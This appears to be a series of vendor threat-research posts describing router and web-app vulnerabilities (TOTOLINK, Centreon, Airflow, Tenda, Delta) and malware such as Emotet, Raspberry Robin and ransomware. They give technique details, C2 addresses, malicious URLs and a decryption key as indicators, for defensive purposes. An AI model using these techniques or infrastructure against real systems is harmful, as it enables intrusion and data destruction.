Posts

TOTOLINK A3000RU Command Injection

/in /by

Zioncom (Hong Kong) Technology Limited also know as TOTOLINK is a professional manufacturer for network communication products, including Wireless Router/AP (Indoor & Outdoor), Wireless USB Adapter, Wireless Module, Switch and Wired Router. ZIONCOM (HK) was established on 1999.

A3000RU is a wireless router complies with the latest IEEE 802.11ac wave2 Wi-Fi standard, with MU-MIMO technology offering continual high speed data transmission for multiple devices at the same time.

Command injection vulnerability exists in TOTOLINK A3000RU router.

Command Injection Vulnerability
The goal of command injection attack is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation

TOTOLINK A3000RU Command Injection | CVE-2022-25075
TOTOLink A3000RU V5.9c.2280_B20180512 was discovered to contain a command injection vulnerability in the “Main” function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

In the following exploit the attacker can pass commands like ‘wget’ via the query string . This command is used to download toto.sh script from the attacker controlled website. The attacker then changes the permissions of the script and executes the malicious script on the device.

 

SonicWall Capture Labs provides protection against this threat via following signature:

  • IPS 15515:TOTOLINK A3000RU Command Injection

IoCs
179.43.142.11
36db973e85684633846a2cd9c46ca48896b5703b9aeb174b1f741633428f68c1

Threat Graph

Raspberry Robin Malware Is An Obfuscated Onion

/in /by

This week, the SonicWall Capture Labs Threat Research Team analyzed a new sample of Raspberry Robin. First observed in May 2022 by Red Canary, Raspberry Robin is a worm that has evolved to be a delivery system for a host of threat actors and malware platforms (This currently includes EvilCorp, LockBit, BumbleBee, IcedID, and DEV-0950). It is unique in that the authors are using a custom obfuscation method that virtualizes the code and has 15+ layers to prevent detection and/or analysis, as well as deploying a custom Tor client for C2 communications.

Infection Chain

Raspberry Robin is known to spread via infected USB devices, utilizing the ‘AutoRun’ feature on plugin. The malware will run via a .LNK file on the USB drive that executes ‘MSIExec.exe’ to download a first-stage payload. Once the system is found to be a valid target, the second-stage payload drops and connects to a Tor address. Initial analysis of the dropper program shows that it begins as a small .zip file (950kb-1250kb) which unpacks another .zip file of roughly the same size. This second archive unpacks into a ~700MB setup file with a .cpl (Control Panel Item) extension, and a text file with instructions to run the installation (Figure 1). Successful execution creates persistence with a RunOnce Key in the registry (HKEY_CURRENT_USER/ and the next stage is downloaded.

Analysis


Figure 1: First stage that creates a .LNK file on any attached USB

The first item to note is the size of the dropper: a 700mb file once unpacked. Most of this is garbage data located within the final section (Figure 2). The massively inflated size is an attempt to bypass scanning by some AV/EDR products, as well as prevent it from being uploaded to public sandboxes.

Figure 2: Note the bottom section ‘.rxy’ has a massive size; it is nothing but the character ‘[‘ repeated

Figure 3: PeStudio results of the secondary layer showing no libraries, imports, exports

Both the dropper and the payload are built with multiple layers of anti-analysis techniques; each is more akin to a virtually-protected machine than an obfuscated file. There are no strings or imports, and thus no API calls to use for context (or use breakpoints with) in a debugger.

Figure 4: Obfuscation through instruction

Every instruction is a series of mathematical actions (add, sub, mul, etc) to change flags, memory offsets, and dynamically call imports. Though no packer is listed with any static analysis tool, this behavior closely resembles how VMProtect works to virtualize runtime and prevent or hinder analysis. Attempting to run the malware in multiple virtual environments failed to produce malicious activity, but several tools were immediately shutdown when loading the sample for analysis. The DLL file will also unload itself when attempting to use a debugger.

This sample is known to drop a fake payload to distract an analyst or AV/EDR tool, located in ‘C:\User\AppData\Local\Temp’. The real payload will use a custom Tor client and reach out to a random hard-coded address for additional payloads or C2 activities. While targets have mostly been government and telecom agencies, there is no reason why other industries couldn’t be affected in the future. Given the sophistication of Raspberry Robin, care should be taken with USB drives and Windows policies on auto-running content.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV:RaspberryRobin.A (Dropper)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cryptonite Ransomware leaves files unrecoverable

/in /by

This week, the Sonicwall Capture Labs Research team analyzed a ransomware called Cryptonite. It is an open-sourced ransomware that was once available on GitHub but has now been taken down. It exhibited behavior consistent of most ransomware but later versions were found to malfunction and leaving encrypted data unrecoverable.

Infection Cycle:

The ransomware installer arrives as a fake windows update and can use the following filename:

  • WindowsUpdate.exe

This ransomware is written in Python thus a Python interpreter needs to be present in the victim’s machine for it to successfully run. Therefore upon execution, all the necessary files and modules are dropped in the temp directory under a randomly named folder.

A window then pops up showing the status of the supposed download of a software update, complete with the progress bar.

Meanwhile, encryption of the files are happening in the background. Encrypted files have the file extension “.cryptn8” appended to them.

This ransomware uses the Python cryptography module and more specifically uses an implementation of Fernet to perform encryption.

In our static analysis, we found that this unique key generated using this Fernet implementation appears to be sent out to a remote server hosted on this domain – hxxps://e4c0660414bf.eu.ngrok.io

Upon successful encryption a standard warning message is then presented to the victim which allows the victim to enter a decryption key if they decide to contact the ransomware operator.

However, later samples have been found to not complete the entire infection cycle. During encryption the ransomware application abruptly crashes with an error. Encryption completes but that key never gets sent to the remote server leaving the files unrecoverable. Subsequent execution of the ransomware just encrypts the already encrypted files and thus ransomware essentially just wiped out the data in the victim’s machine.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Cryptonite.RSM  (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

Microsoft Security Bulletin Coverage for December 2022

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-44673 Windows Client Server Run-Time Subsystem (CSRSS) Elevation of Privilege Vulnerability
ASPY: 387: Malicious-exe exe.MP_291

CVE-2022-44675 Windows Bluetooth Driver Elevation of Privilege Vulnerability
ASPY: 389: Malicious-exe exe.MP_293

CVE-2022-44683 Windows Kernel Elevation of Privilege Vulnerability
ASPY: 388: Malicious-exe exe.MP_292

CVE-2022-44698 Windows SmartScreen Security Feature Bypass Vulnerability
ASPY: 390: Malformed-File js.MP_27

The following vulnerabilities do not have exploits in the wild :
CVE-2022-24480 Outlook for Android Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41074 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41076 PowerShell Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41077 Windows Fax Compose Form Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41089 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41094 Windows Hyper-V Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41121 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41127 Microsoft Dynamics NAV and Microsoft Dynamics 365 Business Central (On Premises) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44666 Windows Contacts Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44667 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44668 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44669 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44670 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44671 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44674 Windows Bluetooth Driver Information Disclosure Vulnerability
389There are no known exploits in the wild.
CVE-2022-44676 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
389There are no known exploits in the wild.
CVE-2022-44677 Windows Projected File System Elevation of Privilege Vulnerability
388There are no known exploits in the wild.
CVE-2022-44678 Windows Print Spooler Elevation of Privilege Vulnerability
390There are no known exploits in the wild.
CVE-2022-44679 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-44680 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44681 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44682 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-44687 Raw Image Extension Remote Code Execution Vulnerability
389There are no known exploits in the wild.
CVE-2022-44689 Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability
388There are no known exploits in the wild.
CVE-2022-44690 Microsoft SharePoint Server Remote Code Execution Vulnerability
390There are no known exploits in the wild.
CVE-2022-44691 Microsoft Office OneNote Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44692 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44693 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44694 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44695 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44696 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44697 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44699 Azure Network Watcher Agent Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-44702 Windows Terminal Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44704 Microsoft Windows Sysmon Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44707 Windows Kernel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-44710 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44713 Microsoft Outlook for Mac Spoofing Vulnerability
There are no known exploits in the wild.

Centreon SQL Injection Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Centreon is a network, system and application monitoring tool. Centreon is the only AIOps Platform Providing Holistic Visibility to Complex IT Workflows from Cloud to Edge.

  A SQL Injection vulnerability has been reported in the Centreon Web Poller Resource module. The vulnerability is due to insufficient input validation.

  A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-41142.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 7.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 7.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  An SQL injection vulnerability exists in Centreon Web, it’s due to insufficient validation of the resource_activate request parameter when adding a new poller resource. An HTTP POST request is sent to /centreon/main.get.php with a parameter p set to “60904”, main.get.php loads the script www/include/configuration/configResources/resources.php which reads the value of parameter o.

  When adding poller resources parameter o is set to “a”, and resources.php loads the script www/include/configuration/configResources/formResources.php. formResources.php reads the submitA request parameter, and if present calls the function insertResourceInDB() in script www/include/configuration/configResources/DBFunc.php.

  insertResourceInDB() calls insertResource() in the same script, then insertResource() assembles an SQL query based on the request parameters and executes. insertResource() sanitizes some of the request parameters, however it fails to sanitize resource_activate. See “Attack Delivery” below for an example of the HTTP POST request that injects an SQL statement against the Centreon database.

Triggering the Problem:

  • The target must have the vulnerable software installed.
  • The attacker must have network connectivity to the target server.
  • The attacker must have access to Configuration > Pollers > Resources page.

Triggering Conditions:

  The attacker authenticates to the server and receives a valid token. Next, the attacker sends an HTTP request with a malicious resource_activate[resource_activate] parameter. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 4098 Web Application SQL Injection (CREATE TABLE) 3

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic using the signature above.
  The vendor has released the following patch regarding this vulnerability:
  Vendor Advisory

Apache Airflow DAG Injection Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Apache Airflow is an open-source workflow management platform. Apache Airflow is a flexible, scalable workflow automation and scheduling system for authoring and managing Big Data processing pipelines. Written in Python, the project is highly extensible and able to run tasks written in other languages, allowing integration with commonly used architectures and projects such as AWS S3, Docker, Apache Hadoop HDFS, Apache Hive, Kubernetes, MySQL, Postgres, Apache Zeppelin, and more.

  Airflow originated at Airbnb in 2014 and was submitted to the Apache Incubator March 2016. The Apache Software Foundation (ASF), the all-volunteer developers, stewards, and incubators of more than 350 Open Source projects and initiatives, announced Apache® Airflow™ as a Top-Level Project (TLP).

  A OS command injection vulnerability has been reported in Apache Airflow. This vulnerability is due to improper input validation for parameters for directed acyclic graphs (DAGs).

  A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in OS command injection.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-24288.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Airflow is designed under the principle of “configuration as code”. While other “configuration as code” workflow platforms exist using markup languages like XML, using Python allows developers to import libraries and classes to help them create their workflows. Apache Airflow utilizes the Django web application framework that implements a model-template-views (MTV) architectural pattern.

  Directed Acyclic Graphs (DAGs) are collections of tasks users are able to execute; organized in a way that reflects their relationships and dependencies. Airflow uses directed acyclic graphs (DAGs) to manage workflow. There are a number of operations that can be performed including: triggering a DAG task, selecting a graph, viewing trees, deleting DAGs, and viewing code. The Base Airflow install includes examples of DAGs to demonstrate various features inside its package installer.

  The example DAG (example_passing_params_via_test_command), shows a templated command with arguments using echo to print a string. The raw arguments of “foo” and “miff” are added to a flat command string and passed to the BashOperator class to execute a Bash command.

Triggering the Problem:

  • The target host must have the affected version of the product installed and running.
  • The attacker must have network access to the target system.
  • The vulnerable DAG must be un-paused.
  • The attacker must have access to an account with the RESOURCE_DAG_RUN permission

Triggering Conditions:

  A malicious POST request is sent to the target server to run the vulnerable DAG.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2606 Apache Airflow DAG Command Injection 1
  • IPS: 2607 Apache Airflow DAG Command Injection 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Filtering traffic based on the signatures above.
    • Deleting the vulnerable DAG.
    • Minimizing the number of users with the RESOURCE_DAG_RUN permission.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Delta Electronics Deserialization Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Delta Electronics InfraSuite Device Master is a tool for centralized monitoring and control of a large number of devices. Users create a human-machine interface (HMI) to manage the devices. Users observe the status of all devices, query event logs or history data, and assists users in taking appropriate action. InfraSuite Device Master implements a 3-tiered architecture, including the Data Collection layer, Gateway layer and Presentation layer.

  An insecure deserialization vulnerability exists in Delta Electronics InfraSuite Device Master. The vulnerability is due to missing input validation when processing messages sent to Device-DataCollect service.

  A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation allows arbitrary code execution with privileges of the user running the vulnerable software.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-38142.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.5 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability is due to a combination of a lack of authentication required to access the exposed Device-DataCollect service and also for insecure deserialization when processing messages sent to Device-DataCollect service. When a BinaryFormatter serialized request is sent to DeviceDataCollect, the InfraSuiteManager.Common.PacketHeader object is deserialized by calling the vulnerable method DeSerializeBinary() in the .NET class InfraSuiteManger.Common.Serialization from the method CheckPacket() in the .NET class InfraSuiteManager.Common.PacketOperation.

  Next, the method DoUpperLayerNWPacket() in InfraSuiteManager.DataCollectionLayer.DataCollectionLayerMngt is called from the MainLoop() method in the same class to process the packet payload object which is expected to be one of the objects of type:

  InfraSuiteManager.Common.DCLayerNWCommand_DeviceObject,
  InfraSuiteManager.Common.DCLayerNWCommand_Protocol,
  InfraSuiteManager.Common.DCLayerNWCommand_Polling,
  InfraSuiteManager.Common.DCLayerNWCommand_Server,
  InfraSuiteManager.Common.DCLayerNWCommand_DCServerSand,
  InfraSuiteManager.Common.DCLayerNWCommand_LogPollingRawData

  This method will call one of the methods: DCLayerNWCommand_DeviceObject(), DCLayerNWCommand_Protocol(), DCLayerNWCommand_Polling(), DCLayerNWCommand_Server(), DCLayerNWCommand_DCServerStatus() or DCLayerNWCommand_LogPollingRawData(), dependent on the value of the i32PayloadType field in the InfraSuiteManager.Common.PacketHeader object. Each of these methods call the vulnerable method DeSerializeBinary() in .NET class InfraSuiteManger.Common.Serialization.

  The vulnerable method DeSerializeBinary() invokes the method System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize() where the insecure deserialization can occur. The code does not perform checks on the contents of the serialized object. The attacker can thereby employ ysoserial.net gadget generator to craft malicious payloads instead of PacketHeaderObject or PacketPayloadObject leading to arbitrary code execution vulnerability.

  ysoserial

Triggering the Problem:

  • The target must have the vulnerable software installed.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  The attacker sends a malicious serialized payload to the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • Device-DataCollect Protocol

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2063 Delta Electronics InfraSuite Device Master Insecure Deserialization

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Detect and filter malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  ICS-CERT Advisory

Tenda AC1200 Cross-Site Scripting

/in /by

Tenda products include home networking, business networking, switch, broadband CPE, gateway, powerlines, mobile broadband and IP cameras. Tenda offers AC1200 routers as well. AC means that the router has support for the 802.11ac (or Wi-Fi 5) wireless networking standard, which offers fast WiFi network connections on the 5GHz frequency. The number that comes after AC represents the maximum theoretical bandwidth of the router with 1200 representing 1200 Mbps.

Cross-Site Scripting
Cross-Site Scripting (XSS) attacks are a type of injection attack that occurs when malicious scripts are injected into otherwise benign and trusted websites. An attacker then uses a web application to send malicious code, generally in the form of a browser side script, to the end user.

Reflected XSS attacks abuse the dynamic way websites interact with  browsers. These attacks make it possible , for an attacker, to control the victim’s browser and their interaction with a given vulnerable website. Injection attacks display back content provided or controlled by a user, like an URL parameter or an input field. This opens the door to manipulation of the content.

Stored XSS occurs when the injected script is permanently stored on the target servers via a database, message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.

Tenda Cross-Site Scripting Vulnerability | CVE-2022-40846
Tenda is vulnerable to both Reflected and Stored XSS attacks.
The Tenda AC1200 router does not perform proper validation of user-supplied input and is vulnerable to cross-site scripting attacks via the homepage’s connected application hostname field. This vulnerability exists in the remote web management console.

As seen above the XSS successfully triggers and returns information about session cookies.
Tenda is also vulnerable to stored XSS in the website filtering functionality (CVE-2022-40844). The URL management panel of the website filtering accepts and stores any input without proper validation. Anything injected within the URL body is stored and will be reflected back once its associated group name is clicked in the panel.
Quick check on Shodan reveals vulnerable devices:

 

SonicWall Capture Labs provides protection against this threat via following signatures:

  • IPS 18814: Tenda AC1200 Cross-Site Scripting

TOR chat with Black Basta ransomware operator runs dry

/in /by

The SonicWall Capture Labs threat research team has recently been tracking a ransomware family called Black Basta. Black Basta first appeared in April 2022 and is believed to be operated by a well organized cybercrime group called Fin7. It has been reported that this group has already breached over 90 organizations and caused over $1B USD in damage.

 

Infection Cycle:

 

Upon execution, a console appears with the following text:

 

It then quickly disables console output using the FreeConsole Windows API:

 

It obtains information about storage volumes attached to the system and begins its encryption process:

 

Encrypted files are given a “.basta” file extension.

 

The malware uses RSA encryption.  The key is hardcoded and can be seen in the decompiled binary:

 

Various configuration options can also be seen in the decompiled code:

 

In order to prevent system recovery, the malware disables volume shadow copies using the vssadmin.exe program:

 

The malware drops dlaksjdoiq.jpg

 

dlaksjdoiq.jpg contains the following image:

 

A ransom message is written to readme.txt.  This file is copied into all directories containing encrypted files:

 

readme.txt contains the following ransom message:

 

fkdjsadasd.ico is dropped onto the system:

 

It contains the following icon:

 

The tOr link leads to the following page:

 

After logging in using the requested information, a chat interface is presented:

 

We had the following conversation with the attacker but were unable to obtain information about file retrieval costs:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: BlackBasta.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Emotet Is Back!

/in /by

Introduction

After several months of hiatus, Emotet is back. SonicWall Capture Labs threat research team has observed starting last week that the notorious malware, which heavily targets large organizations, has returned with similar tactics and functionality observed in past variants. Originally a banking trojan, Emotet has evolved into a dropper-type class of malware. It has been spreading through malicious Microsoft Office documents via email. Initially using JavaScript, VBA macros are now used to compromise the victims’ machines.

Figure 1: Infection Chain

Infection Vector

The infection vector is Excel 4.0 macros with malicious code distributed across excel spreadsheet cells. By default, the Excel file is opened in protected view, with the macros disabled. For this, Emotet Excel files have one image with instructions (Figure 2) asking user to copy the file to <Microsoft Office>\Templates folder and run again. This makes sure that execution of macros will be carried out seamlessly with user interaction.

Figure 2: Malicious document warning. The required actions infect the machine.

The macro code contains multiple URLs which further download the emotet dropper DLL.
URLs:
hxxp://app.clubdedocentes[.]com/storage/DCcq9ekgH99sI/
hxxp://linhkiendoc[.]com/app/payments/qoy5JqpLqrbsKl/
hxxp://sourcecool[.]com/throng/iOD/
hxxp://www.stickers-et-deco[.]com/Adapter/lYw/

Out of these 4 URLs only 3 were active at the time of analysis. These URLs downloaded 3 Emotet dropper DLLs having similar functionality. The DLLs are executed using regsvr32.exe.

Figure 3: View of the malicious VBA macro

DLL Analysis

Emotet is known for distributing many different malware families. During the analysis of two samples, no additional malware was observed being dropped or downloaded.

Sample 1

The dropper DLL has highly obfuscated custom packer code, including encrypted main Emotet DLL. The listed APIs involve multiple imports that are known to be used with malware. These cover multiple areas of monitoring, enumeration, execution, encryption, persistence, and exfiltration. Multiple APIs are loaded using DWORDs stored in memory (Figure 4).

Figure 4: Packed code shown in x64dbg

The custom decryption loop is used to decrypt the main Emotet DLL using key “vGZlfkkg?U^>+xzU”. Once regsvr32.exe is executed, the DLL is moved and renamed to “~\AppData\Local” and/or “\Windows\System32\” locations with a randomized name for both the parent folder and the file itself. A registry key is then created to autorun when the system is restarted (Figure 5).

Figure 5: Run Entry created for persistence

The process will then attempt to reach out to multiple IP addresses with a generated cookie and collected data. After initial communication with CnC servers it downloads further Emotet spammer module to the same folder or the “Appdata” directory.
For further spreading spammer module uses multiple malicious email templates like the one mentioned in Figure 6 below.


Figure 6: Email Template

It also uses a number of email domains, email addresses, their passwords and other information including malicious email attachments to spread across domains as seen in Figure 7.

Figure 7: Email Addresses and Passwords

This elaborates the redistribution mechanism of malware to infect other victims using already compromised email credentials.

Sample 2

This sample was a separate DLL file that showed several differences in both code and behavior. Manually running the decryption function resulted in a DLL being created within newly allocated memory space, but instead of a randomly named file, it’s called ‘clover.dll’ (Figure 8)  and differs from the dropper in multiple ways.

Figure 8: Clover.dll allocated in memory

 

The first point is that when clover.dll drops, it lacks several of the anti-analysis features that the original has; notably, one can go directly to the entrypoint in a debugger without the program terminating itself. There is also a string that produced only two Google results (f:\rtm\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl), both of which are samples on Alienvault OTX[i][ii].

Running ‘clover.dll’ with regsvr32.exe results in the same behavior as the dropper sample. It is moved to ~AppData\Local, a registry key is created for persistence, and system enumeration begins. Regsvr32 then spawns a child process and kills the parent (Figure 9), becoming a ‘non-existent process’; this is an anti-analysis technique that prevents debuggers from attaching to the process.

Figure 9: This process does not exist (to a debugger)

The second part to note is the way Emotet is communicating with the C2 servers: using regsvr32.exe to send TCP requests. No tool normally used for packet capture will show the action (Fiddler, Wireshark, TCPMon), except for Procmon. The entire communication occurs within 2-3ms as seen in Figures 10 and 11. Attempts to use netstat also failed.

Figure 10: Procmon output of TCP communications

Figure 11: Timestamps from beginning to end

Looking at the runtime memory of regsvr32, a large list of C2 addresses were found (Figure 12), along with cookie information and public keys.

Figure 12: Beginning of C2 list in private-mapped memory

 

SonicWall Real Time Deep Memory Inspection (RTDMI) is detecting the malicious Excel spread sheet in CAPTURE ATP. The emotet dropper, emotet dll and spammer module are also being detected by RTDMI.

Evidence of detection by RTDMI ™ engine for the emotet dll can be seen in the below screenshot :


Figure 13: RTDMI ATP Report results

IOCs

SHA256:
0bbcf67529105af0086ba37236adde773fa862a9af187c75903868d01b390202
a116213f16ecd416cbde43ddf94d3e5af1935886d19db1e978225c15616c1d7b
faf0a6cea7e6a5d7fea43ed8e2f89eee56f712e6334e19e1b4c2b75ffb71f720
dcb3f8703accb02764306e112857adf35fd93c46cd7bfe45a295f16e6a215c72
bf60837275da15ef6f67ab6214fea56a084045d19c056c01faecd3c5d5b7f207
baf72fda8d35b6f6653ecdae1bfac9ddb373b9a4e7d27e586cce30201557a1f8
c680183e3a3650a0930960227d8659ee5bba1406ef5c8f01546fd0c165c9eca2
04c40a669fcfcd20bd429cbe4f78c71e8403ca70f804262a24024cb40dba321b
64dca5069a1e7b3ed910d6525550cf1235de5199cb2a195da490d2cfb65334e4
b8d2ad91155d779270b7cb8b914e5a262d8a05bf39ba44dd56935a1ee9bc066e

C2 IP Addresses:

1.234.2[.]232:8080
101.50.0[.]91:8080
103.132.242[.]26:8080
103.43.75[.]120:443
103.75.201[.]2:443
104.168.155[.]143:8080
107.170.39[.]149:8080
110.232.117[.]186:8080
115.68.227[.]76:8080
119.59.103[.]152:8080
129.232.188[.]93:443
139.59.126[.]41:443
139.59.56[.]73:8080
147.139.166[.]154:8080
149.28.143[.]92:443
149.56.131[.]28:8080
153.126.146[.]25:7080
159.65.140[.]115:443
159.65.88[.]10:8080
159.89.202[.]34:443
160.16.142[.]56:8080
163.44.196[.]120:8080
164.68.99[.]3:8080
164.90.222[.]65:443
167.172.199[.]165:8080
167.172.253[.]162:8080
169.57.156[.]166:8080
169.60.181[.]70:8080
172.104.251[.]154:8080
172.105.226[.]75:8080
173.212.193[.]249:8080
182.162.143[.]56:443
182.162.143[.]5:8080
54.37.136[.]187:8080
95.54.66[.]204:1013
183.111.227[.]137:8080
185.4.135[.]165:8080
186.194.240[.]217:443
188.44.20[.]25:443
197.242.150[.]244:8080
201.94.166[.]162:443
206.189.28[.]199:8080
209.97.163[.]214:443
212.24.98[.]99:8080
213.239.212[.]5:443
45.118.115[.]99:8080
45.176.232[.]124:443
45.235.8[.]30:8080
5.135.159[.]50:443
51.161.73[.]194:443
72.15.201[.]15:8080
79.137.35[.]198:8080
82.223.21[.]224:8080
91.187.140[.]35:8080
91.207.28[.]33:8080
94.23.45[.]86:4143
95.217.221[.]146:8080

URLs:

hxxp://app.clubdedocentes[.]com/storage/DCcq9ekgH99sI/
hxxp://linhkiendoc[.]com/app/payments/qoy5JqpLqrbsKl/
hxxp://sourcecool[.]com/throng/iOD/
hxxp://www.stickers-et-deco[.]com/Adapter/lYw/

Public Keys:

RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5z/VpKQADAJA=
